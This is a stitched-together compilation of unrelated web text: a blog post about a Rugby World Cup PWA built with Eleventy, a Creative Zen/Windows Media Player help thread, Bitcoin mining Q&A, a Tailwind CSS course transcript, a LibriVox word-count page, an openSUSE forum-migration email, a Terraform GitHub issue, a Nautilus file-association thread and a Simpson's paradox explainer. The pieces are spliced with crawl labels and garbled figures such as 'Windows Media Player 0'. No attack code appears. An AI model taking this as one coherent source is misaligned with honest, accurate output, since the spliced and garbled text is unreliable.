Since I was using Eleventy as the static site generator to build the site, I found this plugin that provides PWA capability for Eleventy sites. I followed the creator's guide to set it up, and pretty much left it from there. It worked, in that, I was able to download the site to my phone and run it as an app. However, because of the basic implementation, I had used, my app (and website for that matter) was presenting me with cached data and would only update if I manually refreshed the page.
I'd definitely like to build more PWAs in the future, and so learning more about services workers is definitely on my to-do list for this year!
Perhaps next time I'd add some live score functionality.
This would depend on being able to find and access data to pull in live scores. I flirted with the idea of trying to hack the official Rugby World Cup website to either scrape data from their match pages or find JSON data I could use. In the end, it was too much effort, and I also didn't want myself getting into a mess over copyright/data infringements.
A friend of mine also suggested perhaps linking to an official Twitter hashtag for each game, or to an external match centre so that people could follow games live there. Both are ideas I'll explore in the future if I decide to build a similar site.
Build this site for the 2019 Rugby World Cup as a personal project sure did result in more learnings that I was anticipating. It's given me things to learn more about and also showed me that I am capable of spinning up a full site with minimal turnaround without relying on any frameworks. I'm hoping to spin up a website for next year's southern hemisphere rugby season, but that's still some time away. In the meantime, I've got a few more things to study up on.
|
OPCFW_CODE
|
AdvertisementWhen I plug in my Zen Vision M, Windows Media Player 0 starts up and starts synchronizing. I want a totally different program to come up -- or NO PROGRAM AT ALL!?I can't find a way to do this with the zen. I went into WMP settings and said don't synchronize. It ignores me. I tried going to windows explorer and changing device properties, but that tab is not available.
Stop WMP10 from starting when I plug in Zen Visio
AdvertisementOK, under Windows Media Player, SYNC SETTINGS, I found a menu that allows me to change syncing from automatic to manual. So now the syncing doesn't occur when I plug in the device. But Windows Media Player 0 STILL opens, and I don't want it to. I'd rather have nothing open, or else a program of my choosing. Just to be clear, here's a copy of my post at experts exchange:?*****When I plug in my Zen Vision M, Windows Media Player 0 opens. (For technical reasons I need to use WMP version 0, NOT or beyond.)
I want a totally different program to come up -- or NO PROGRAM AT ALL! -- when I plug in the zen player.
I can't find a way to do this with the zen. ?I went into WMP settings and said don't synchronize, which worked. ?But when I go into the device properties, there's no menu for choosing which program opens with the device. You don't get the usual menus under windows explorer. ?
In fact, the only way I can get to a device properties menu at all is to plug in the device, and then go to Zen Media Explorer (which is a shortcut / device under Windows Explorer). The device appears there as a sub-folder, and has a properties menu. But again, this menu doesn't allow for choosing which programs run when the device is plugged in.
I found a check box that said "show zen in windows explorer as portable device". I checked this and restarted explorer. But all the menus / choices for this are the same as for the above "Zen Media Explorer"
Likewise I looked under Dev Mgr properties -- there's a properties menu, but no where to choose which program runs when device is plugged in.
*****Message Edited by dgrrr on -06-2007:4 AM
- [Creative Zen 4gb] How can I plug my Zen into my PC without he's gonna lo
- USB not recognized when i plug in Zen Mi
- Plugged my Zen Vision W in before installing the software.Now its stuck in docked mo
- When I plug my zen micro into my
- Problem with Visio Plug-in Rendering All Layers
- Playcount sync with WMP10- ZEN MI
- Problems with zen x-fi after downloading new update or after plugging it into my hi
- HELP! Plugged Zen Micro into wrong charg
- Creative Zen M 30GB Freezes Everytime I plug into the computer
- MY Zen Micro everytime I plug it in goes and stays on Recovery?????? Can you help
- Battery loses charge... when plugged in car lighter socket (1
- OK, Zen Touch Owners, Listen Up!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Helpful hints for new Creative Zen MP3 2/4/8/16/32 GB (flash) Users On
- ZEN Vision M, will not start up or charge at all.
- I've installed firmware for my zen micro, now i can't use my creative software! Please he
- Can I transfer Music from One Zen Micro to another Zen Mic
- Zen Vision:M files disappe
- Mediasource Organizer destroyed 2000
- MediaSource Organizer not seeing Zen To
If I put music on my Zen he's loading too, but that's bad for the battery when he load much times a little bit. so,How can I plug my Zen into my PC without he's gonna load?When you mention 'load' are you referring to the Zen being charged because the
after a lengthly install -- and seemingly successful i plugged in the Zen Micro and i get this error message USB DEVICE NOT RECOGNIZED one of the USB devices attached to this computer has malfunctioned and windows does not recognize it. so i click th
Okay, I know it was a stupid mistake, but I somehow missed the part in the directions that said NOT to plug in the Zen before installing. I plugged it in during installation, which I've always done with my other creative mp3 players. Big mistake. Now
the zen micro media explorer tells me "The device is not connected to you pc. Please connect your Zen Micro to the computer'. I've not used it for a while and I may be doing something stupid, but has anybody any idea why this may be? ThanksWhat about
Hey everyone I've been beating my head against a wall and I'm in need of some major help. I have a Visio diagram that has a lot of layers. I have 2 generations of this diagram. The first generation works without any issue. The second one, however fai
Hi, OK, i use WMP0 and have firmware 2.20.05- since the upgrade I have been using the improved functions of WMP0 a lot to create auto-playlists, a number of which revolve around how recently I listed to the tracks (eg 4* rated not heard for a month..
hiya a couple of days ago i downloaded the new update for my zen x-fi 32gb, on the same day i plugged the zen into my hi-fi for the st time ever since then the volume has been quieter and my equalizers havent been working when i start the player up a
I plugged my Zen Microphoto 8 GB into my cell phone charger by accident, I didn't think it would affect it and unplugged it right away when i came back to turn it on it wouldn't work. When I opened up the back and looked at the battery it said to onl
Every Time I plug my Zen into to the computer via USB the player freezes and I have to reset. I have reinstalled the firmware several times, cleanup, and format in the recovery section but still nothing. If I start the player up with no usb it scroll
MY Zen Micro everytime I plug it in goes and stays on Recovery?????? Can you help
Every time I plug my Zen Micro in it goes to recovery mode and just stay there. When it boots up it says Firmware Problem, then loads to the diagnostics screen with four options. Option four reboots it fine. Option one and two just freeze up. Option
Hello everyone, When I travel and plug my Zen Micro in the 2v adapter in my car, the music plays, the charging indicator flashes... but when I unplug the zen, for example 2 or 3 hours after, the battery is or 2 bars of charge less than when I plugged
OK, Zen Touch Owners, Listen Up!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OK, when I tried to update the firmware on my Zen Touch to the PlaysForSure update, all of the original firmware was removed, and I could do nothing. This happened to a lot of other users, and most of their solutions seemed to be unique to the second
Summary of helpful hints (from this forum and me) for new Creative Zen MP3 2/4/8/6/32 GB (flash) Users Only! Rev.. Date: 4/28/2008 Author: ZenAndy Creative terminology: MP3 Player Recovery Tool - A program that resolves the majority of player problem
Hello, I have tried letting the player charge (even though it doesn't show that it's charging) on my computer USB for about 4 hours now, and still nothing... I tried the restart button, nothing... I tried holding the power switch on and restart butto
I've installed firmware for my zen micro, now i can't use my creative software! Please he
I wanted to download some music from napster and to play it on my player it told me I needed a firmware upgrade. I knew from buying my player that I probably would need to upgrade so I did. Once I installed the upgrade, and plugged my zen micro in an
Hello, I've had my Zen Micro (Green) for 3 weeks now and now my girlfriend wants one a Zen Micro too, which she'll get in the next few days. I was wondering if there's any way to transfer mp3s from my Zen Micro to hers? I was thinking if I plugged 2
Greetings: I recently uploaded some videos to my Zen Vision:M. They all appeared on my Zen for awhile, but the last time I went to look at them all but disappeared. I plugged my Zen into the computer and used Media Explorer to browse to the video fol
I bought my Zen Touch the other day and was glad for it, until I installed the Mediasource Organizer... I thought that through it I might be able to synchronize the Zen with what's on my computer... Still haven't found any solution to this. In order
Seems there are quite a few questions like this without any good answers (that i can find, i apologize in advance if this has been in fact answered before), so i am going to try and spell everything out as detailed as possible in hopes of help. I hav
|
OPCFW_CODE
|
When pool mining, how do I get paid?
Just for fun i decided to check out bit coins and do some mining. No visions of making millions or anything I just find the concept pretty cool. At any rate I have installed guiminer in windows and i have installed the bit coin wallet from the bitcoin site.
How do i get my address so that i can have someone send me funds and in the mining software how do i set it up so that it knows where to deposit funds? I have it up and running using btc guild pool but it has never asked me about how to send me bit coins.
I am confused i feel like i am missing the most important piece of the puzzle.
You need to get a receiving address from the client (or from an e-wallet if you prefer) and copy and paste it into the address field against your account in BTCGuild.
Bear in mind that if you're using the Bitcoin-QT client there is a very long synchronisation process to wait for, though you may be able to get a receiving address before it completes (but you won't see any received bitcoins in your wallet until it's synchronised). Depending on your hardware and bandwidth, synchronisation may take several days to complete.
While there's no receiving address against your BTCGuild account, you'll just be accumulating bitcoins against your BTCGuild balance, so you aren't losing anything in the meantime.
Bear in mind that the "difficulty" level of mining for the network as a whole has risen to a very high level due to the arrival of highly efficient dedicated ASIC bitcoin mining hardware. This means mining on graphics cards is likely no longer profitable (depending on purchase and electricity costs) and CPU mining hasn't been profitable for a long time.
I spent pretty much all of last night reading up on this then came across litecoins. Would this be a better thing to "get into". Again from a mining point of view i am not investing "hard" currency on any of this beyond cpu/gpu cycles. I find it fun lol.
@Ominus, if you can earn a profit mining them, then the only reason I can think of not to would be your principles. My guess is that the Litecoin exchange rate is somewhat on the high side, so if you do it I'd recommend exchanging them to another currency quickly rather than hold them, but that's just my personal opinion. I did a little Litecoin mining myself at one point and exchanged them for BTC on vircurex. Some would consider it a waste of time, because much of Bitcoin's value is in its popularity; Litecoin doesn't have that.
Well I am new to this too, but already did research on it. The BitCoin client and Mining Client is two different software for two different purposes(They used to be same, I read it somewhere). The Bitcoin client is just for handling your wallet, safegaurding your private keys, creating public keys (aka receiving addresses). I'd suggest you to try an e-client for eg. BlockChain in beginning.
Mining is another thing where you lend your pc's computing power to Bitcoin blockchains in return of free Bitcoins. It really sucks out your processing power.
So in general you'll just need a BTC client which will generate a receiving address for you which you can paste on the site of the mining pool you're using for mining. You can generate different address for different pools (or senders), so that you can track who's sending how much.
|
STACK_EXCHANGE
|
In this tutorial we will see how to make a short program allowing us to make measures with the ultrasonic HCSR04 sensor included in the Gamebuin accessory pack with CircuitPython.
This tutorial is made with Mu IDE for CircuitPython.
If you haven’t installed those yet please refer to the installation guide on our website.
Start by opening Mu editor and creating a new file.
Copy the following bit of code :
from gamebuino_meta import begin, waitForUpdate, display import time import board from digitalio import DigitalInOut, Direction _USE_PULSEIO = False try: from pulseio import PulseIn _USE_PULSEIO = True except ImportError: pass while True: waitForUpdate() display.clear()
This will import the Gamebuino libraries needed to make our program work. We add the libraries “time” and “board” that will allow us to use time-related functions and to read data from the console’s external ports (where we plug our sensor). We also add specific functions from the “digitalio” and “pulseio” libraries we will need to manipulate our sensor.
The part beginning by “While True:” is our main loop, without it our program wouldn’t do anything. We will complete it a bit later.
In order to use our sensor we will need to handle the two parts it is made of, those parts being the emitting TRIG part and the receiving ECHO part. Both are plugged into digital pins, D4 for the TRIG part and D3 for the ECHO part. Here we will specify to our program that those two pins will be used.
It’s done in the following way :
trig_pin = DigitalInOut(board.D4) trig_pin.direction = Direction.OUTPUT
We specify that our digital pin D4 is now called “trig_pin” and we define it as an OUTPUT pin.
We then handle our ECHO pin :
if _USE_PULSEIO: echo_pin = PulseIn(board.D3) echo_pin.pause() echo_pin.clear() else: echo_pin = DigitalInOut(board.D3) echo_pin.direction = Direction.INPUT
Here we specify that our D3 pin will be called “echo_pin” and define it as an INPUT pin. Note that we use a conditionnal expression to define the pin status as we used another conditionnal to import our PulseIn function above.
We then declare a couple of variables called “timeout” and “error_count” such as :
timeout = 0.1 error_count = 0
We will use them to check if our sensor works properly.
Now we will declare a function to perform a measure using our sensor. Then we will briefly see how to display the result and handle error cases.
Thus we declare the function “US_measure()” such as :
def US_measure(trig, echo, timing):
Note that this functions takes 3 parameters : Our two pins trig and echo as well as a third parameter called timing. It is not absolutely necessary to do it this way, we do so to make our code clearer and save a bit of time.
Keep in mind we are making a very simple program, in a more complex one it would become increasingly important to keep your code organized and “neat” to make it easier to use and work on.
Now we can fill up our function. First we will initialize our measure at zero to avoid reading unwanted leftover data from the memory. Then we will activate our emitter to send a wave of ultrasounds :
echo.clear() trig.value = True time.sleep(0.00001) trig.value = False
“echo.clear()” clears up the memory so our measure does start at zero.
We then define our trig pin value to “True”, wait for 1/10000th of a second and redefine its value as “False”. Basically we sent power to our emitter for 1/10000th of a second so it could work and send ultrasounds, it may seem short but it is plenty enough.
We will then add a couple of variables to help us for what’s coming :
def US_measure(trig, echo, timing): echo.clear() trig.value = True time.sleep(0.00001) trig.value = False pulselen = None timestamp = time.monotonic()
The value of pulselen is initialized at None, equivalent to null, this variable will be used to return the measured value at the end of our function. The timestamp variable will be used as a reference point in time. The time.monotonic() function gives it an arbitrary time value, subsequent calls to this function will return different values that can only be higher. Comparing those vallues will allow us to determine whether time has passed or not. Check the function documentation online if you want to know a bit more.
We can now add the second part of our function that will perform a measurement and return the obtained result :
if _USE_PULSEIO: echo.resume() while not echo: # Wait for a pulse if (time.monotonic() - timestamp) > timing: echo.pause() return (0) echo.pause() pulselen = echo if pulselen >= 65535: return (0) # positive pulse time, in seconds, times 340 meters/sec, then # divided by 2 gives meters. Multiply by 100 for cm # 1/1000000 s/us * 340 m/s * 100 cm/m * 2 = 0.017 else: return pulselen * 0.017
We start by activating our ultrasound receptor, the ECHO pin, with the function “echo.resume()”.
Then we wait to pickup a signal. For this we compare our timestamp variable with another call to the “time.monotonic()” function, if the result is inferior to our “timing” variable (worth 0.1 second) we stop the sensor with the “echo.pause()” function and return 0 since the measure didn’t occur.
If we did pick up a signal we then pause the sensor and store the obtained value in our pulselen variable. This value will be equal to the time elapsed between the signal emission by our TRIG emitter and its reception by our ECHO receiver, it is also called “flight time”.
If the value stored in pulselen is superior or equal to 65535 then an error occured and the distance measured is either too great or the sensor malfunctionned, in both cases we return 0.
Finally if everything went well and our flight time is within reasonable range we multiply it by 0.017 and return the value we get. This will give us a distance in centimeters.
Now we can finish our program by completing our main loop. We make a call to our “US_measure” function, store the result in a variable and proceed to display the result on screen.
Nothing too complicated here, our loop should look like this at the moment :
while True: waitForUpdate() display.clear()
Let’s start by calling our measurement function :
while True: waitForUpdate() display.clear() M_distance = US_measure(trig_pin, echo_pin, timeout)
We create a variable called “M_distance” that calls the function and stores the result.
Now we can either display the result or, in case of errors, display an appropriate message :
while True: waitForUpdate() display.clear() M_distance = US_measure(trig_pin, echo_pin, timeout) if M_distance: display.print("Distance = ") display.print(str(M_distance)) display.print(" cm") else: error_count += 1 if error_count > 9: display.print("Measurement Error") error_count = 0 time.sleep(0.1)
We check if our variable does contain a non null value with “if M_distance”. If it does then we simply display a bit of text along with the variable’s content using the “display.print()” function.
If our variable is null, meaning it is equal to 0, then our function didn’t pick up any significant measurement. In this case we increment our “error_count” variable by 1, if this value gets higher than 9 then our measuring function has been called 10 consecutive times in our main loop without any success. So we display the “Measurement Error” message using the “display.print()” function.
Finally we use the “time.sleep(0.1)” function to pause our loop for 0.1 second between each occurence.
You now have a neat little program to test your HCSR04 ultrasonic sensor with your Gamebuino Meta.
This tutorial is based on a library created by Adafruit that is sadly not available on Gamebuino hardware. Some code elements have been taken from the original documentation of this library to replicate its function.
|
OPCFW_CODE
|
A second and third version of this course released using Next 13+, but this course is great if you want to see another example fullstack project. We now recommend you take the Build an AI-Powered Fullstack Next.js App, v3 course.
Transcript from the "Setup Styles & Tailwind CSS" Lesson
>> All right, so now let's go ahead and actually configure our global CSS so we can actually get things looking the way they're supposed to look. So if we go to our notes here, we're going to use Tailwind CSS, we talked about this before. So to install Tailwind CSS is actually we already installed it with NPM so we don't have to.
[00:00:22] Really do anything. We just have to add a config and we got some more global stuff here. So what you want to do is you just wanna take this global CSS right here that we have, which I could walk you through, but basically React or Next.js's router. Adds extra divs around scroll containers.
[00:00:45] This is basically saying, give us back control of those scroll containers so we can do stuff without this. You can't get like full screen stuff. It's kinda weird. This is the number one thing that'll kill all apps, box sizing. Border box. These are gradients that I made to go in the background.
[00:01:03] Here's our glass thing that we already made. So you can overwrite that. And then same thing like before next year, yes, adding extra divs and giving it back to control for us. So it's going to copy all of that. If this thing well it doesn't wanna scroll for me, so I'm just gonna have to do it like this.
[00:01:23] Gonna go here, go to global, and I'm just gonna put that in there like that. Scroll down, do the same thing, so just some CSS in there.
>> Yeah. And they were saying the filter that you had just filter, instead if you scroll down, you now have backdrop filter.
[00:01:57] Cuz before you had filter and that was actually filtering out the text.
>> That was filtering out the text. Yeah.
>> Yeah, so now using backdrop filter, it's doing the thing that you-
>> It's doing the thing that I wanted to. Yeah, yeah. Yeah, that makes sense. It looked weird when I was writing it but I went with it.
[00:02:14] [LAUGH] So yeah backdrop filter it makes more sense. All right, and then now we need to set up our Tailwind config which I kind of already have here. You don't really need it because it kind of already knows where everything is other than like this app directory so we want to set that up for the app directory.
[00:02:39] So what you want to do is just on your root of your project you want to do Tailwind config. I also think there's an NPM or a command to do this with a CLI would tell me I just never use it so can't recommend it what it is but I think they do have one, I just always just do it from scratch because it's really not that much.
[00:02:58] So what we're gonna do here is like a Tailwind config Did I spell that right? Till when I thought it was like a different color if I did Or was it tailwind dot config? Yeah Tailwind dot config. I know there's an icon for that, so when you don't get those icons, you know you got the file names wrong.
[00:03:58] So you can say, type, and then it's just, it's just like, kind of like an import statement. So you'll say imports in the way that I have it here. Let's see. I just have it here I was copied. This is saying this type is Tailwind CSS config type.
[00:04:18] If we write this in TypeScript, we could just import that type but we're not. So for the content then we just want to go ahead and add the gloves for. The files that have the components that we want apply these to, which in this case is just going to be like the app directory.
[00:04:33] And I think the way you do this, it's going to be like app and then you can do the glob the catch all, then probably the extensions. So in our case, TSX. We're only using that but just to be safe, might as well do that. Might as well do that and might as well do that too I guess, just to be safe.
[00:04:54] And we'll do the same thing for pages, which we probably won't be using, but hey, set yourself up. And then we definitely are using components. Like that. Cool. And then for theme, really the only thing we really care about here is gonna be the fonts. So we're gonna extend the theme which I believe until when just exactly what sounds like allows you to extend the theme and not override it with something other value, which is if you didn't put extend that's what happened.
[00:05:27] We learned that out the hard way and we want to change the font family here and what we want to change it to is this CSS variable that we're going to set inside of our layouts so we're just gonna say Sans and then. We're gonna use this font like this, font enter.
[00:05:47] So if you've never seen CSS variables or properties, that's what it looks like when you declare them. And we're gonna set this in a layout so it just works. Okay, and the last thing we need to do is add these directives to our global CSS. So let's do that.
[00:06:10] Go to our global CSS at the very top. We'll just add those things If line five looks weird. What this is saying is, apply this style to the Tailwind base layer. These are all considered layers Let me say we're applying this to the layer called base. Okay, any questions on that?
[00:06:49] OK. Let's go see. No, not this one of the great, it's not the full one. OK. All right. So we still got to add some costs here because the whole one's obviously messed up. Let's go check out the other ones. No we didn't do register we did sign it right.
[00:07:14] I think we did sign it. Here we go. So it's not quite but we got obviously Tailwind has kicked in, the glass stuff seems to be somewhat blurry, there's definitely a gradient going on here. We still got a lot more CSS to write when we get to the pages but for the most part Tailwind has kicked in
|
OPCFW_CODE
|
I have to agree with much of the above. In the last 24 hours this forum has gained one new member, and this should be right in the middle of its boom period when it's only just been made public and should be drawing in new members in numbers. The number of posts we're making as a community is fine for the size, so there's all the signs of an active community to reassure potential joinees, but if this forum wants to survive and thrive then it probably needs at least 100 members, and as many over that as possible.
Considering that NYCFC aren't actually playing games right now, the news coming out of the club is understandably sporadic, and while the club are doing a good job of building hype via social media, this forum has a challenge to face to stay active until around November-December time when I'd estimate that the announcements and excitement will ramp up and become constant. It'll be a challenge maintaining that with only 35 registered members. Once the club starts playing games I doubt that creating and maintaining an active forum community will take much effort, but right now it's a different story.
Unfortunately I use social media only for reading opinions, not for spreading my own - I've tried to run a twitter campaign before and it didn't go so well, so I'm not really in a great position to give advise on this matter. That said, if I were to say one thing it's that I've noticed that the #nycfc hashtag is fairly active in general, and I've got no idea how many people actively read it but on the assumption that it's not just me, perhaps any attempts to advertise the forum should try including this?
Edit: one other thing - and it does pain me somewhat to say this. I've gathered that a lot of NYCFC fans on twitter and facebook are quite adamant that this club should resist having too strong ties to MCFC, and they don't want a MCFC-USA. They are probably right in that this club being too openly associated with Manchester City would drive away a lot of potential interest. I've noticed, however, that a high percentage of us here are MCFC fans ourselves. It might be advisable trying to consciously limit talk of Man City to the Premier League forum and the occasional thread about how the two clubs will work in tandem - otherwise we may gain a reputation for being a Manchester City forum about NYCFC, which would predictably reduce our incoming member count. I'm probably not helping with my avatar, but oh well. I kind of joined up thinking I'd be the token (Man) City fan, but it might have been a poor decision in retrospect.
I don't know though. I'm just throwing that out there. What do other people think?
|
OPCFW_CODE
|
LibriVox member peegee has written a script for web browsers which may make the BC's job of compiling word counts for the Magic Window a little easier.
How it Works
The script runs against the HTML ebooks on Project Gutenberg.
- you click the paragraph where you want to start the count,
- it asks you the target number of words,
- it quickly goes through every paragraph from that point onwards and counts the words and the running total
- it stops when it reaches the target, or the end of the chapter if before
- the page is temporarily changed to display the word counts right there at the end of each paragraph
- you can repeat this as many times as you like, each time you click a paragraph the temporary page changes are removed
Here are a few screenshots to illustrate the process:
Installing the Script
The method of installation depends on the browser (Firefox and Chrome may need to be re-started after installation, Opera does not):
- Greasemonkey You will first need the GreaseMonkey add-on for Firefox which is available from this link.
- Firefox Install Once you have GreaseMonkey installed, go here and click on the Install button
- TamperMonkey First you'll need to install TamperMonkey from the Chrome store.
- WordCount Then, you'll be able to install the word count extension from here.
- the script then go to the script
- click the Install button to get the script in a new tab in Opera.
- from the Opera menu click File > Save As to save it into the folder you chose in the first step (probably best to just keep the suggested file-name - whatever name you choose it MUST end in .user.js )
The script only works on the Gutenberg online HTML books, not the text or zipped HTML, or other formats.
If you have any problems installing or using this script you can either post a message in this forum thread or send a Private Message to peegee.
Script for Gutenberg Texts
This website script will count out the number of words in each chapter. Enter the Gutenberg project ID number, fill in additional information (how many chapters there are, how the chapter headers are written, etc) and it will return the chapter word counts and the first and last words in the chapter.
Web Browser Bookmarklet
Creating a new bookmark, with the code below, will count the words in a highlighted piece of text.
You can use Word Count for the bookmark name, and then put the code into the address box, in the details section.
Microsoft Office Word
Microsoft Word, and probably other text document creation software, has built-in word counting software. Copy and paste your text into a blank page, Select All (or highlight the portion you are word counting), and go Review/Word Count.
|
OPCFW_CODE
|
On Tue, 2021-01-12 at 15:10 +0100, Stasiek Michalski wrote:
I actually already had a version of our forums running
and I think if we are gonna migrate the forums we might as well go
something open source right away ;)
I'm not opposed to that, of course.
The snag we had, and I can't tell still how
important it is, is the
thing that also happens with your version of the forums:
forums before certain date are completely broken due to changes in
encoding in php decade ago.
I noticed these character encoding errors, too, and decided to ignore
them because they also occur in the existing forum. As long as the
migration doesn't make anything worse than it currently is, I'm
satisfied. Also, fixing the character encoding issues can be solved
independently in a separate task, at least if upgrading to vb5.
Porting the forums to discourse is probably not as forgiving, though.
In that case, it is required to fix the encoding issues first, I guess.
Honestly if you have the time to spend on vb5, I would
see the time spent on migrating to Discourse, and I can probably
in some capacity so we get it all salted as well right away.
I'm not opposed to migrating to Discourse, or helping with it. It's
just that I had the impression the effort had petered out a bit, and
maybe was semi-abandoned?
So my idea was to at least take one small step forward by making sure
we at least run on a reasonably modern and supported platform, thereby
giving us ample time to work out the next step.
Most important notes in that migration is that you
have to use a
converter script on the database because if you don't you end up
the only working posts being the ones from before 2011 or so. I used:
with everything working correctly.
Interesting - I'll give that a go.
Additional point, since discourse maps users onto
emails, we have to
request SUSE IT to give us a list of usernames matching emails
vb4 has wrong emails for usernames, I don't think it's important to
explain why that is).
Has this been requested already? If not, why?
We agreed with the Forums team on deploying at least
. Discourse will
to be set up using OIDC provided by our ipsilon instance at
, and I hope we can also use the js script that
discourse into pages as a comments system for news.opensuse.org
have comments functionality there (in the future we may also want to
use it for software-o-o, but that's still up in the air).
Sorry, I've been out of the Heroes loop for a while, wasn't aware of
that agreement. I do agree that OIDC integration is a must-have, and
any other integration between our online assets would also be cool.
|
OPCFW_CODE
|
I have observed the following on different machines, using opensuse 10.3 and 11 - different accounts - same behavior. It is strange but I have searched for a solution several times spent hours found nothing.
OK the problem is: openoffice files are not correctly associated with openoffice in nautilus. I know the open-with thing but it does not help:
Every time I click on .odt .ods .od… nautilus asks me: Do you want to run “Filename.odt” or display its contents? “Filename.odt” is an executable text file. [Run in Terminal] [Display] [Cancel] [Run]
Frustrating. RMB/Openwith/Other…/Openoffice works, but it does not allow to save that as a default decision.
As it does happen on fresh created new accouts too, I do not think it is a pernonal settings problem or is it?
All my 5 machines are either OpenSuse10.3 or updated to OpenSuse11 same behavior everywhere …
yes, thanks, but as I sad the open with dialog does not help. Shure I can open the filer with by pressing RMB/Openwith/…/…/ but there is NO possibility to say “remember that” or similar. So this does not help.
Meanwhile I could find out a very interesting thing. The described behavior ONLY happens on FAT16 (USB disks) pluged in and auto mounted in nautilus.
Can someone reproduce this issue?
(To make it clear: open by dobbleclick on a local odt file works. copy the same file to the usb drive. double click on it nautilus says its an executeable text file … no “reassigning possible” via open with …)
> yes, thanks, but as I sad the open with dialog does not help. Shure I
> can open the filer with by pressing RMB/Openwith/…/…/ but there is
> NO possibility to say “remember that” or similar. So this does not
> Meanwhile I could find out a very interesting thing. The described
> behavior ONLY happens on FAT16 (USB disks) pluged in and auto mounted in
> Can someone reproduce this issue?
> (To make it clear: open by dobbleclick on a local odt file works. copy
> the same file to the usb drive. double click on it nautilus says its an
> executeable text file … no “reassigning possible” via open with …)
FAT, in any of its variations, does not support the READ/WRITE/EXEC flags
present in linux’s ext2/3 and variants. The system emulates R/W/X and forces
them on for the files… which is why you’ll always see 'executable jpg’s and
whatnot, since the filesystem defaults to emulating those permissions for the
When the file is copied to the FAT16 (or FAT32) filesystem, it gains the
execute flag automatically. Nautilus senses the executable flag first, then
interprets the magic numbers for each filetype… which kills the ‘open with
Copying the file to the hard drive doesn’t help, since the RWX flags are
copied along with it… so you end up with a file marked as executable,
although it’s not executable (in any manner). If you right click on the
file, choose properties and clear the ‘is executable’ flag on the permissions
tab, all will be good.
This is a “bug/feature” associated with Microsoft’s FAT filesystem formats.
msdos/fat16/fat32/vfat are all affected by this. Adding the ‘mode=0644’ or
‘fmask=0644’ option to the mount options can help.
Again, this isn’t an issue with Nautilus, this is an issue concerning using
FAT based filesystems to convey files.
well Loni might be right, but sometimes you cannot do anything against having .odt files marked executable (i.e. our heterogeneous Network here having Windows and Linux machines mounting the same “fileserver”). For example I do not have permissions to change file attributes on the server. What am I do than?
I do think there is another solution, since our Gentoo workstations do not show this behavior, it is only my Openoffice 11. which just annoys me everytimes with asking if I do what to execute my odt file.
Since this happens with all USB sticks as well, I do not understand why I should be the only one annoyed with this?
I do use the default settings to mount USB sticks in Opensuse (at least I did not change anything) … I didn’t found anything in the forums here …
|
OPCFW_CODE
|
target_group_arns option not supporting lists
I have issues
I'm submitting a...
[x] bug report
[ ] feature request
[ ] support request
[ ] kudos, thank you, warm fuzzy
What is the current behavior?
I am trying to add target groups to the Autoscaling group, using the target_group_arns option from the worker_groups variable.
When setting this variable as a list, empty or not (it is defined by default as a list), I get the error:
module.eks.aws_autoscaling_group.workers: lookup: lookup() may only be used with flat maps, this map contains elements of type list in:
${compact(split(",", coalesce(lookup(var.worker_groups[count.index], "target_group_arns", ""), local.workers_group_defaults["target_group_arns"])))}
However, when I input a string of multiple comma-separated arns, it accepts them and works as intended
If this is a bug, how to reproduce? Please include a code sample if relevant.
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "4.0.2"
cluster_name = "test-cluster"
worker_groups = [
{
ami_id = "ami-0e82e73403dd69fa3"
instance_type = "m5a.xlarge"
asg_desired_capacity = "2"
asg_max_size = "2"
asg_min_size = "2"
target_group_arns = [] # Should work, does not
# target_group_arns = ["<arn1>", "<arn2>"] # Should work, does not
# target_group_arns = "<arn1>,<arn2>" # Works, should probably not
}
]
worker_group_count = "1"
}
What's the expected behavior?
I would expect that using a list, the `terraform apply works and the arns are added to the ASG target_groups
Are you able to fix this problem and submit a PR? Link here if you have already.
Environment details
Affected module version: 4.0.2
OS: OS X
Terraform version: 0.11.14
Any other relevant info
You're reading the documentation for v5 of the module which is for Terraform 0.12 and the new HCL2 syntax.
Terraform 0.11 did not do well with lists in lists or interpolation syntax.
Check the comments for the version of the module you're using:
https://github.com/terraform-aws-modules/terraform-aws-eks/blob/v4.0.2/local.tf#43
target_group_arns = "" # A comma delimited list of ALB target group ARNs to be associated to the ASG
Ah, my bad sorry.
Thanks
Le mer. 17 juil. 2019 à 15:33, Daniel Piddock<EMAIL_ADDRESS>a
écrit :
You're reading the documentation for v5 of the module which is for
Terraform 0.12 and the new HCL2 syntax.
Terraform 0.11 did not do well with lists in lists or interpolation syntax.
Check the comments for the version of the module you're using:
https://github.com/terraform-aws-modules/terraform-aws-eks/blob/v4.0.2/local.tf#43
target_group_arns = "" # A comma delimited list of ALB target group ARNs
to be associated to the ASG
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub
https://github.com/terraform-aws-modules/terraform-aws-eks/issues/437?email_source=notifications&email_token=ABORCQYRPMUSZ24N2LO2ZP3P74NRJA5CNFSM4IEQBLO2YY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOD2EGRPA#issuecomment-512256188,
or mute the thread
https://github.com/notifications/unsubscribe-auth/ABORCQ3UK3IDDJSSD6YEXHLP74NRJANCNFSM4IEQBLOQ
.
|
GITHUB_ARCHIVE
|
How Can This Be?
Mathematical paradoxes are always interesting, especially when they seem even more than paradoxical...that is, just plain wrong! A prime example is Simpson's Paradox.
Consider these baseball batting averages for two players, broken down by their performance against right-handed and left-handed pitchers:
Notice how Player A overall has a better batting average than Player B (i.e. r > R), yet Player B had better batting averages against both left-handed and right-handed pitchers (i.e. r1 < R1 and r2 < R 2). How can this be?
Rather than spoil the paradox for you, I note that nothing is wrong with either the data or the mathematics. If you need resolution, you can find "it" by searching on-line (and see Tan's article below for a great geometric explanation of this same data).
The paradox was "first" described by mathematician Edward Simpson in a 1951 paper. He was not aware that statisticians Karl Pearsonal etal and Udny Yule had already described the paradox in 1899 and 1903 respectively.
Though the above data represents fictitious data, real-life examples exist. In his book A Mathematician at the Ballpark, Ken Ross illustrates the paradox using the batting averages of Derek Jeter and David Justice during the baseball years 1995 and 1996.
The February 1982 issue of the American Statistician provides multiple real-life examples:
Many other exampels exist: patient survival rates in two different hospitals, voting patterns, misleading bias in college admissions, deceptive class sizes for different teachers, etc.
- The overall subscription rate for the journal American History Illustrated increased from January, 1979 to February, 1979, yet the rate decreased for every category of subscriber.
- The overall federal income tax rate increased from 1974 to 1978 but decreased for every income tax bracket. (Sounds like something we need today!)
- The overall death rate fro tuberculosis in 1910 was greater in Richmond (VA) than in New York City, but was less for both whites and non-whites.
